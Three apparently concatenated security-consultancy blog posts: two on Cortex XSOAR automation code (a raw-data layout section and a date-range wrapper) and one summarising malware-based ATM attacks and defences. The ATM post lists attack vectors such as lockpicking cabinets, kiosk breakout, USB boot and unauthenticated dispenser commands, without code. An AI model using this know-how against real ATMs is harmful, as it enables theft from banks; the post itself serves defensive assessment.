Incident Info tab of a Cortex XSOAR incident – the name of the incident points to unsanctioned cloud app usage by a user, but neither information about the user nor about the unsanctioned app was extracted.

This can happen in many different ways, most commonly because the exact data scheme used by the tool that generated the alert has changed. When this happens, the information we want to extract is present in the alert we fetch; it's just not located where we're used to finding it. In such cases, a manual inspection of the raw data that came in is sufficient to identify where the data we want can be found. However, as shown in the next screenshot, manually inspecting the raw data of an incident is not that user friendly in Cortex XSOAR.

View of the “Context Data” of a Cortex XSOAR incident – the presentation of the available data is unsuitable for manual inspection

To make it easier, we built our own dynamic section, which displays curated data from both the labels and some entries of an incident. The result is as follows:

In this example, Azure Active Directory identifiers are available and can be leveraged to get the details of the involved user. In a similar manner, the Cloud Application Id is available.

Our dynamic section is powered by an automation that enumerates the labels of the current incident.

ret_labels = {}
incident = demisto.incident()
if not (isinstance(incident, dict) and "labels" in incident.keys()):
    return_error("Current incident has no labels")  # guard body reconstructed; message is illustrative
labels = incident["labels"]
if not isinstance(labels, (list, List)):
    return_error("Incident labels are not a list")  # idem
for label in labels:
    ...

Similarly, it also enumerates specifically tagged war room entries.

ret_notes = {}
investigation_id = demisto.incident()["id"]
uri = f"investigation/{investigation_id}"
body = {
	"pageSize": 100,
	"categories": [],
	"tags": ["raw_data"],
	"notCategories": [],
	"usersAndOperator": False,
	"tagsAndOperator": False
}
body = json.dumps(body, indent=4)
args = {"uri": uri, "body": body}
res_cmd = demisto.executeCommand("demisto-api-post", args)
for res in res_cmd:
	if not (isinstance(res, dict) and isinstance(contents := res.get("Contents"), dict)):
		continue
	if not isinstance(response := contents.get("response"), dict):
		continue
	if not isinstance(entries := response.get("entries"), (list, List)):
		continue
	for entry in entries:
		...

Once the incident labels are fetched, we extract their contents:

for label in labels:
	if not isinstance(label, dict):
		continue
	label_type, label_value = label.get("type"), label.get("value")
	if not (isinstance(label_type, str) and isinstance(label_value, str)):
		continue
	try:
		label_value = json.loads(label_value)
	except Exception:
		pass
	try:
		ret_labels.update({label_type: label_value})
	except Exception:
		pass
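The decode-with-fallback pattern applied to each label value can be isolated into a small helper (the function name is mine, for illustration):

```python
import json

def decode_label_value(value):
    """Label values are strings that may themselves contain JSON:
    decode when possible, otherwise keep the raw value."""
    try:
        return json.loads(value)
    except (json.JSONDecodeError, TypeError):
        return value

print(decode_label_value('{"appId": "1234"}'))  # {'appId': '1234'}
print(decode_label_value("plain text"))         # plain text
```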

In a similar fashion, for each returned War Room entry, we extract the name of the parent playbook task and the content of the entry:

for entry in entries:
	key = ""
	if not isinstance(entry, dict):
		continue
	if isinstance(entry_id := entry.get("id"), str):
		key += entry_id
	if isinstance(entry_task := entry.get("entryTask"), dict):
		if isinstance(task_name := entry_task.get("taskName"), str):
			key += " - " + task_name
	value = None
	if isinstance(cnt := entry.get("contents"), str):
		try:
			value = json.loads(cnt)
		except Exception:
			value = cnt
	ret_notes.update({key: value})

To tie it all up, and because our goal is to offer a tree like navigable output, we structure our outputted data into a dictionary.

ret = {
	"notes": ret_notes,
	"labels": ret_labels
}

At that point, we cannot just output this dictionary as is; we need to encapsulate it in a way that indicates to the layout that we want this layout element to be shown as a JSON tree.

results = CommandResults(raw_response=ret)
return_results(results)

By now, our code is good to go and all we need to do is to edit our incident layout to add a new tab and create a new dynamic section powered by the automation we just built.

In Cortex XSOAR, navigate to Settings, Objects setup, Layouts, and either modify an existing layout or create your own. From there you can add a new General Purpose Dynamic Section.

Once your General Purpose Dynamic Section is added to your layout tab, you can edit it and choose the automation it executes. If your automation does not show up in the list of available ones, make sure you added the “dynamic-section” tag to it.

In this blog post, we have shown you how to display complex data in an incident layout which can be used by a security analyst to provide more context. In future posts, we will present more detailed context additions that tie in nicely with the Cortex XSOAR user interface.


Palo Alto Cortex XSOAR documentation: how to add a custom widget to the incident and indicator pages

Microsoft Sentinel Cloud Application Entity Identifiers

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team. As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Cortex XSOAR Tips & Tricks – Dealing with dates



As an automation platform, Cortex XSOAR fetches data that represents events set at defined moments in time. That metadata is stored within incidents, queried from various systems, and may undergo conversions as it moves between machines and humans. With its various integrations, Cortex XSOAR ingests datetimes from sources that use different standards, yet manages to keep track of all of them.


In this blog post, we will go over dates in Cortex XSOAR, showing where they are presented and used, as well as how they are stored and passed around.
We will present a real world use case for extracting the dates being passed to the elements of a dashboard. With that in mind, we will go deeper onto the technicalities of passing timeframes to widgets and present an object oriented approach to interpreting and converting those, ensuring that this becomes an easy process, even when using third party tools.
The codebase for this post is available on the NVISO GitHub repository.

Dates in XSOAR

Let’s look at the use of dates in Cortex XSOAR throughout the GUI and let’s pay attention to the formats we encounter:
Within incident layout tabs, incident fields of type “date” are formatted in a human readable way.

Occurrence, Creation, and Last update dates in the Timeline Information GUI widget of an XSOAR Incident.

However, in the raw context of an Incident, we see the same dates but stored in the ISO 8601 format:

Multiple datetime fields in the Context GUI of an XSOAR Incident

The dates we can observe in the raw context are formatted to be machine readable; this is what Integrations, Automations, and Playbooks read.

The dates visible in the layout tab are rendered live from those in the context. Cortex XSOAR adapts this view depending on the current user’s preferred timezone, which is saved in their user profile. This explains the 1 hour difference between the raw dates and their human readable counterparts in our examples above.
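The same conversion can be sketched outside of XSOAR with plain Python. A minimal example (the timestamp and the Europe/Brussels timezone are our own illustration, not values taken from the screenshots) rendering a machine readable context date for a user’s preferred timezone:

```python
from datetime import datetime
from zoneinfo import ZoneInfo

# A date as it would be stored in the incident context (UTC, ISO 8601)
raw = "2022-01-15T07:00:00Z"

# Parse the ISO 8601 string; "Z" is normalized to "+00:00" for
# compatibility with datetime.fromisoformat() on Python < 3.11
stored = datetime.fromisoformat(raw.replace("Z", "+00:00"))

# Render it for a user whose profile timezone is Europe/Brussels
# (UTC+1 in winter, hence the 1 hour difference seen in the layout)
local = stored.astimezone(ZoneInfo("Europe/Brussels"))
print(local.strftime("%B %d, %Y %H:%M"))  # January 15, 2022 08:00
```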

Moving on to the dashboards page, we get a time picker to selectively view Incident and Indicator data restricted to a given period of time. In the next part, we will find out how this time frame is passed down to the underlying code generating the tables and graphs that make up the dashboard. For that purpose, we will build a new dashboard composed of a single automation-based widget.

Date Range Selector of a XSOAR Dashboard, set to display information from the “Last 7 Days”

The dashboard date picker

We just saw that Dashboards introduce a date picker element. It lets you select both relative timeframes such as “Last 7 days” and explicit timeframes where you define two precise dates in time. To find out how this is effectively passed down, we will use an automation based widget and dump the parameters provided to this automation.

If you need help on creating an automation, please refer to the XSOAR documentation on automations.

Let’s create an automation with the following code, not forgetting to add a ‘widget‘ tag to it.

import json

# Return the automation's input arguments as formatted JSON
demisto.results(json.dumps(demisto.args(), indent=4))

The snippet above will print the arguments passed down to the automation.

To run our automation and get its output, we need to create a new dashboard and add a text element to it; its content will be populated by our automation. For help on creating a dashboard and automation based widgets, please refer to XSOAR – add a widget to a dashboard and XSOAR – creating a widget automation.

We start our reversing effort by using the dashboard with an explicit timeframe:

Dashboard output with the date range “19 Apr 2022 – 22 Apr 2022”

At first glance, we identify the two arguments that interest us, “to” and “from”, each containing an ISO 8601 string corresponding respectively to the upper and lower bounds of our selected timeframe.

When we use relative dates, we still get ISO 8601 strings. However, the “to” argument now holds a default value pointing to January 1st of year 1.

Dashboard output with the date range “Last 6 months”

Finally, when we use the ‘All dates’ date picker, we get two of these placeholder strings.

Dashboard output with the date range “All times”

The findings above can be understood as a de facto standard for passing dates and time frames, and we can assume that all builtin Cortex XSOAR content can handle it. However, this may not be the case for third party tools. To interface with the latter, and to create our own dashboard compatible content, we need a way to interpret these dashboard parameters.
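As a small illustration of interpreting these parameters, here is a minimal sketch (the helper name is ours, not an XSOAR builtin) that distinguishes the placeholder value from a genuine ISO 8601 date:

```python
from datetime import datetime

# Placeholder emitted by the dashboard date picker for unbounded ranges
PLACEHOLDER = "0001-01-01T00:00:00Z"

def parse_dashboard_date(arg: str):
    """Return None for the placeholder value, else a parsed datetime.
    Hypothetical helper, purely for illustration."""
    if arg == PLACEHOLDER:
        return None
    return datetime.fromisoformat(arg.replace("Z", "+00:00"))

print(parse_dashboard_date("2022-04-19T00:00:00Z"))  # 2022-04-19 00:00:00+00:00
print(parse_dashboard_date(PLACEHOLDER))             # None
```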

Objectives redefinition

We have now identified how the dates that define the beginning and the end of a date range are passed to the elements of a dashboard, after a user selects that date range in the web interface. This opens new capabilities: we are no longer bound to dashboard elements builtin to Cortex XSOAR, but can start to imagine querying period-relevant data in third party systems to visualize in our dashboards.

In a future post, we will use our findings to query Microsoft Sentinel for some Incident data, and display the results of that search in dashboards, as well as within incidents. However, a first hurdle will be that not every system we interact with will blindly accept the from and to fields that Cortex XSOAR passes on to us, especially if we get one of those special values. We will first have to come up with a software wrapper that will let us obtain date objects that we can more easily manipulate in Python.

A proposal for interpreting dates in XSOAR

To use the dates stored in our Cortex XSOAR Incidents, and to build our own automation based dashboard widgets, we have come up with an Object Oriented wrapper.
This wrapper introduces classes to describe both these explicit datetimes and their relative counterparts, as well as factories to craft these out of standard XSOAR parameters.

The following snippet describes the different classes:

from abc import ABC
from datetime import datetime

class NitroDate(ABC):
    pass

class NitroRegularDate(NitroDate):
    def __init__(self, date: datetime = None):
        self.date = date

class NitroUnlimitedPastDate(NitroDate):
    pass

class NitroUnlimitedFutureDate(NitroDate):
    pass

class NitroUndefinedDate(NitroDate):
    pass

NitroDate is an empty parent class, with 4 child classes:

  • NitroRegularDate
  • NitroUnlimitedPastDate
  • NitroUnlimitedFutureDate
  • NitroUndefinedDate

NitroRegularDate represents an explicit date, and stores it as a datetime object.

NitroUnlimitedPastDate and NitroUnlimitedFutureDate are both representations of the special date January 1st year 1, but reflect the context they were mentioned in.

NitroUnlimitedPastDate represents that special value having been passed from a “from” argument, such as with the “Up to X days ago” time picker.

NitroUnlimitedFutureDate represents that special value having been passed from a “to” argument, such as with the “From x days ago” time picker.

Finally, NitroUndefinedDate represents either the special value when we cannot identify the argument it was passed from, or the fact that we could not properly parse a date given in input.

Now that we’ve defined the classes we will use to represent our datetimes, we need to build them, preferably from the data supplied by Cortex XSOAR.

from abc import ABC
from datetime import datetime
from enum import Enum
import dateutil.parser

class NitroDateParsingError(Exception):
    """Raised when a date string cannot be parsed."""

class NitroDateHint(Enum):
    """An Enum used as a flag for functions that build NitroDates."""
    Future = 1
    Past = 2

class NitroDateFactory(ABC):
    """This class is a factory, as in it is able to generate NitroDates
    from a variety of initial arguments."""

    @classmethod
    def from_iso_8601_string(cls, arg: str = "") -> NitroDate:
        """Create a NitroDate from an ISO 8601 date string.

        :param arg: the ISO 8601 string
        :type arg: str
        """
        try:
            date = dateutil.parser.isoparse(arg)
        except Exception as e:
            raise NitroDateParsingError from e
        return NitroRegularDate(date=date)

    @classmethod
    def from_regular_xsoar_date_range_arg(cls, arg: str = "", hint: NitroDateHint = None) -> NitroDate:
        """Create a NitroDate from a single argument passed by an XSOAR GUI element and a hint.

        :param arg: the ISO 8601 string or special placeholder string
        :type arg: str
        :param hint: whether the date, if a placeholder value, should be interpreted as future or past
        :type hint: NitroDateHint
        """
        if arg == "0001-01-01T00:00:00Z":
            if hint is None:
                return NitroUndefinedDate()
            elif hint == NitroDateHint.Future:
                return NitroUnlimitedFutureDate()
            elif hint == NitroDateHint.Past:
                return NitroUnlimitedPastDate()
        return cls.from_iso_8601_string(arg=arg)

    @classmethod
    def from_regular_xsoar_date_range_args(cls, the_args: dict) -> (NitroDate, NitroDate):
        """Create NitroDates from the two arguments passed by an XSOAR GUI element.

        :param the_args: the args passed to the XSOAR automation by the time picker GUI element
        :type the_args: dict
        """
        ret = [NitroUndefinedDate(), NitroUndefinedDate()]
        if isinstance(the_args, dict):
            for word, i, hint in [("from", 0, NitroDateHint.Past), ("to", 1, NitroDateHint.Future)]:
                if isinstance(tmp := the_args.get(word, None), str):
                    nitro_date = cls.from_regular_xsoar_date_range_arg(arg=tmp, hint=hint)
                    if isinstance(nitro_date, NitroDate):
                        ret[i] = nitro_date
        return ret

The factory presented above eases work during the development of a dashboard widget by allowing us to obtain two NitroDates with a single call:

FromDate, ToDate = NitroDateFactory.from_regular_xsoar_date_range_args(demisto.args())

The following screenshot demonstrates the use of this factory function and the type and value of its outputs when run against Cortex XSOAR data:

Screenshot of PyCharm showcasing the use of from_regular_date_range_args

From there on, we can check the types of FromDate and ToDate and more easily build logic to query third party systems. At this stage, the wrapper correctly identifies datetimes and timeframes, whether they were passed in a function call or stored in an incident, returns them as standardized Python objects, and detects errors in their formatting.
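As an example of the logic this enables, the sketch below (with minimal stand-ins for the classes defined above; the KQL-style filter is our own illustration, not an official Sentinel integration) turns a NitroDate lower bound into a query time filter:

```python
from datetime import datetime

# Minimal stand-ins for the NitroDate classes presented earlier
class NitroDate: pass
class NitroRegularDate(NitroDate):
    def __init__(self, date=None):
        self.date = date
class NitroUnlimitedPastDate(NitroDate): pass
class NitroUndefinedDate(NitroDate): pass

def to_time_filter(from_date: NitroDate) -> str:
    """Translate a NitroDate lower bound into a KQL-style time filter
    (illustrative only; a real integration would build the full query)."""
    if isinstance(from_date, NitroRegularDate):
        return f"TimeGenerated >= datetime({from_date.date.isoformat()})"
    if isinstance(from_date, NitroUnlimitedPastDate):
        return ""  # no lower bound: query the full history
    raise ValueError("cannot build a filter from an undefined date")

print(to_time_filter(NitroRegularDate(datetime(2022, 4, 19))))
# TimeGenerated >= datetime(2022-04-19T00:00:00)
```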

In a future post, we will use this mechanism to query external APIs from a Cortex XSOAR dashboard.


NVISO Github Repository

ISO 8601

XSOAR documentation on automations

XSOAR – add a widget to a dashboard

XSOAR – creating a widget automation

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Malware-based attacks on ATMs – A summary


Today we will take a first look at malware-based attacks on ATMs in general, while future articles will go into more detail on the individual subtopics.

ATMs have been robbed by criminal gangs around the world for decades. For roughly 20 years, one successful approach has been the use of highly flammable gas, which is fed into the ATM safe and ignited during a robbery. For an attacker, this is an inexpensive way to get the cash, but it also generates great publicity and thus a risk of being caught by security authorities. In addition, more and more machines are being equipped with systems that ink the banknotes as soon as the machine is physically breached.

Since the beginning of the 2010s, more and more criminal gangs have switched to non-violent methods without explosives: so-called physical malware attacks. Here, malicious software is brought onto the PC inside the ATM, for example via a USB stick. Such a malware-based attack usually results in all cash inside the safe being ejected via the regular dispensing mechanism (a cash-out attack). A successful attack effectively puts the malware in full command of the ATM, rendering it almost impossible to stop.

Another aspect that cannot be ignored is that an infected ATM often enables attacks on other devices or services within the network. For example, for research and testing purposes, we were able to develop a malware that attacked all ATMs within the network from an infected device (initial ATM). The result was simultaneous cash withdrawal from all ATMs within the shared network. It was also interesting here that other devices such as a Raspberry Pi connected to the same network could achieve the same results as well.

Even though such malware-based attacks on ATMs decreased during the Covid pandemic in 2020, a clear increase has been visible since the beginning of 2022. Malware to attack specific types of devices can be purchased today for about 1,000 USD on the darknet.

To protect against such attacks, it is necessary to prevent malware from being installed and executed. Through years of research and experience in real projects, we have been able to help ATM manufacturers and banks protect their devices from such attacks.

ATM Internals

Generally, an ATM consists of two components:

The safe

  • Includes:
    • Cash dispenser
    • Cassettes containing banknotes
  • Strongly protected by heavy locks and armored walls

The cabinet

  • Includes the computer connected to other devices:
    • Card reader
    • Pin pad
    • Touch screen
    • Network components
    • etc.
  • Mostly weakly protected from physical attack:
    • Unarmored: door and walls are often made of thin plastic or sheet metal.
    • Poor quality locks: locks are often no better than those on private mailboxes, which can be opened in seconds with a lockpick.
    • Often only one key is used for several ATMs.

The computer inside the cabinet usually runs the Windows operating system, which in turn runs the application for legitimate use of the ATM. A user or bank customer should not be able to break out of this application (e.g. via the touchscreen) to access the underlying system. For this purpose, Windows generally runs in so-called kiosk mode, which limits input options to the necessary user functions within the application.

Inputs to the user application, for example via the touchscreen or pin pad, are processed by the software and then transmitted as commands to other devices such as the cash dispenser. This communication between the user application and internal devices takes place via the XFS standard (Extensions for Financial Services), which provides an interface (API) through which applications can access the Windows hardware manager.
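To make this layering concrete, here is a toy Python model (purely illustrative; the real CEN/XFS interface is a C API with service providers, not this) of an application reaching the cash dispenser through a hardware manager:

```python
class XfsService:
    """Toy stand-in for an XFS service provider, e.g. the cash dispenser."""
    def __init__(self, name):
        self.name = name

    def execute(self, command, params):
        # A real service provider would drive the physical device here;
        # note the absence of any authentication of the caller
        return f"{self.name}: executed {command} with {params}"

class XfsManager:
    """Toy stand-in for the XFS manager brokering application requests."""
    def __init__(self):
        self._services = {}

    def register(self, logical_name, service):
        self._services[logical_name] = service

    def open(self, logical_name):
        return self._services[logical_name]

# Any application on the Windows host can open the same logical service,
# which is exactly what ATM malware abuses
manager = XfsManager()
manager.register("CDM", XfsService("CashDispenser"))
session = manager.open("CDM")
print(session.execute("DISPENSE", {"amount": 100}))
```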

When the user initiates a transaction such as a cash withdrawal, the bank’s processing center is also contacted, which validates the transaction and ultimately transmits the confirmation for withdrawal. The connection between the ATM and the processing center is generally made via a cable, but occasionally also wirelessly (WiFi or GSM).

Overview ATM internals

Overview ATM

Vulnerabilities to ATM malware

In general, we classify ATM vulnerabilities regarding malware attacks into three categories. The combination of vulnerabilities from these categories allows an attacker to dispense all cash or attack other systems on the same network in many cases.

Insufficient physical security

The first step for malware-based attacks is usually to open the cabinet in order to interact with the integrated computer via a plugged-in keyboard or special USB stick. Here, we came into contact with recurring security vulnerabilities in various assessments:

  • The lock of the cabinet is insecure and can be opened with a lockpick within seconds.
  • The housing (door and walls) are made of thin plastic or sheet metal and can be destroyed with minor effort.
  • Locks from different ATMs can be opened with the same key. If an attacker obtains such a master key, they can often open all the ATMs in different branches.
  • The keys are not secure against copying. If an attacker obtains a key, it can be copied as often as desired.
  • Lack of security for e.g. USB interfaces. If an attacker succeeds in opening the cabinet, they will in almost all cases find unprotected (open) USB interfaces that allow interaction via keyboard.
Computer inside the cabinet with open USB port

Computer inside the cabinet with open USB ports

Insufficient configuration of the system and peripheral devices

It is often the case that the XFS standard for communication between OS and peripherals is configured very insecurely. There is often no authentication at all between the peripherals and the OS. An attacker with access to the computer could execute malware to communicate with the cash dispenser, and thus cash-out all available money. In summary, we found the following recurring security flaws in the system and device configurations:

  • Insufficient or even missing authentication between USB peripherals and the OS, which allows so-called ATM black-box attacks.
  • Lack of communication encryption between OS and peripherals. An attacker can thus often read sensitive card data and transactions of the user.
  • Lack of hard disk encryption. An attacker can extract and read any hard disk content. In addition to various software that can be misused to further develop malware, we were also able to extract unencrypted videos and pictures of customers that were taken via the camera integrated in the ATM.
  • Inadequate protection of the kiosk mode. If an attacker manages to open the cabinet and plug in a keyboard, they can often break out of the banking application using special keyboard shortcuts and thus access the underlying Windows system. However, in some cases this is also possible via the touch screen of the machine without having to open the cabinet.
  • Boot from external storage media. ATMs are occasionally configured to boot from an attached storage medium such as a USB stick when they are restarted. If an attacker can boot into an alternative system this way, hard disk contents can be completely extracted, or the attacker can even communicate directly with peripherals such as the cash dispenser.
  • Inadequate or missing application control configuration. Today’s malware and public enumeration tools are often executed via Powershell scripts or exe files. In many of our assessments, the execution of such software was insufficiently blocked or not blocked at all.
  • Weak or missing AV solutions. The installation and execution of tools and malware is often insufficiently detected, or not detected at all, because weak AV software is used for protection or it is not up to date.

ATM allows breaking out of the banking application using a connected keyboard, exposing that the current user has full administrative access.

Insufficient network security

An attacker with access to the ATM’s network interface (e.g. Ethernet) can attack other systems or services within the network. In one of our scenarios, it was even possible to dispense cash from all ATMs within the network. In general, such scenarios are based on the following vulnerabilities:

  • Lack of or insufficient network access control. An attacker who has been able to connect to the ATM network via Ethernet often has full authorization to communicate with other systems on the same network. In many cases, infiltration of other devices or even the Active Directory is possible.
  • Unencrypted communication to the backend. An attacker in a man-in-the-middle position between the processing center and the ATM can read sensitive transaction data, but also manipulate it to trigger illegitimate dispensing of funds.
  • Lack of or insufficient authentication to the exposed ATM network service. Spoofed backend commands can often be sent to the exposed ATM service to make it cash out.
Example - Bypassing outdated NAC (Network Access Control) with public tools

Example – Bypassing outdated NAC (Network Access Control) with public tools

Attack Scenarios

Due to the large number of possible vulnerabilities, individual malware-based attack scenarios often arise. The following figure shows general attack scenarios, which are also performed in our assessments.

Overview - Attack scenarios


Recommendations

In general, it is difficult to make all-encompassing recommendations for securing ATMs. Even in our current assessments, we are increasingly confronted with new and very individual security vulnerabilities. However, we can make general recommendations for securing ATMs against malware attacks, as some vulnerabilities are present on a regular basis:

  • The computer should be in the safe. Securing the computer in the safe would probably be the best possible protection against malware-based attacks. Unfortunately, we could not detect such a protection in any of our analyses so far.
  • If it is not possible to place the computer in the safe:
    • The cabinet housing and door should also be made of solid material. It should not be possible to open the lock of the cabinet using a lockpick. Generally, security locks or even digital locks with proper auditing possibilities should be used here. The cabinet of each ATM should only be able to be opened with an individual key.
    • Network devices such as switches should not be placed outside the ATM.
  • All communication between ATM and backend should be encrypted according to current standards.
  • All transactions between the ATM and the backend should be mutually authenticated for example using TLS mutual authentication.
  • All unused services exposed by the ATM should be turned off.
  • The firewall between the ATM and backend should be configured to allow remote access only to the service that is needed. All network services that are not needed should be turned off.
  • Remote access should follow strict password policies or even better: key-based authentication mechanisms.
  • Any communication between the OS and peripherals such as the cash dispenser should be encrypted. Here the ATM vendor can be consulted since it is usually a simple configuration that can be enabled.
  • The OS as well as used applications should be updated regularly including hotfixes.
  • It should not be possible to connect any peripheral (e.g. keyboard) to the computer and use it. One possibility would be to use local OS policies or third-party software to allow only explicit devices. However, one should be careful with such whitelisting, as the device IDs themselves can be spoofed.
  • The execution of scripts or other software should be limited as much as possible and be restricted to only what is necessary. One possibility would be the use of Windows Applocker.
  • Any software that is not needed (e.g. software used for development) should be removed.
  • Hard disks should be fully encrypted.
  • Access to the BIOS should be protected by e.g. setting a strong password.
  • A boot from the hard disk of the ATM should be forced. It should not be possible to access the boot menu without authentication. In addition make sure to enable measured boot.
  • AV solutions should be used and regularly updated. In general, we prefer the use of Windows Defender over third-party software.
  • Abnormal behavior or communication regarding network but also peripherals should be logged and alarms triggered.
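The mutual authentication recommendation above can be sketched with Python’s standard library. This is a minimal sketch, not a vendor integration; the file paths are placeholders for the ATM’s provisioned key material:

```python
import ssl

def build_mutual_tls_context(ca_file=None, client_cert=None, client_key=None):
    """Build a client-side TLS context that verifies the backend's
    certificate AND presents a client certificate (mutual TLS).
    File paths are placeholders for illustration."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse legacy protocols
    context.check_hostname = True
    context.verify_mode = ssl.CERT_REQUIRED           # authenticate the backend
    if ca_file:
        context.load_verify_locations(cafile=ca_file)
    if client_cert:
        # The client certificate is what authenticates the ATM to the backend
        context.load_cert_chain(certfile=client_cert, keyfile=client_key)
    return context

# Example (placeholder paths):
# ctx = build_mutual_tls_context("backend_ca.pem", "atm_cert.pem", "atm_key.pem")
```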


Malware-based attacks that rely on physical access are becoming increasingly popular. Today we can already see some security improvements in current assessments, but our experience shows that the progress made over the last years is still insufficient. Many protections could still be circumvented to exploit initial vulnerabilities. This is usually not because manufacturers and banks deliberately avoid security precautions, but because the whole environment and its processes often do not allow simple security upgrades. For example, to ensure proper network access control (NAC), all switches within all branches would have to be replaced, and technical staff still need an interface (e.g. USB) to perform administrative tasks on the ATM.

In general, it turns out that criminal hacker gangs are always one step ahead and find ways to bypass current security measures.

About the Author

Alexander Poth

Alexander is a senior security consultant at NVISO. He regularly performs a variety of assessments, including IoT and embedded devices, Web and Mobile applications.